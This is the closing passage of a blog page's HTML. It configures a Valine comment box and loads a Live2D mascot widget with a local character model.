    return GUEST.indexOf(item) > -1;
  });
  new Valine({
    el: '#vcomments',
    verify: false,
    notify: false,
    appId: '',
    appKey: '',
    placeholder: 'Just go go',
    avatar: 'mm',
    meta: meta,
    pageSize: '10' || 10,
    visitor: false
  });
  </script>

     







<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/koharu.model.json"},"display":{"position":"left","width":250,"height":500},"mobile":{"show":false},"react":{"opacity":0.7},"log":false});</script></body>
</html>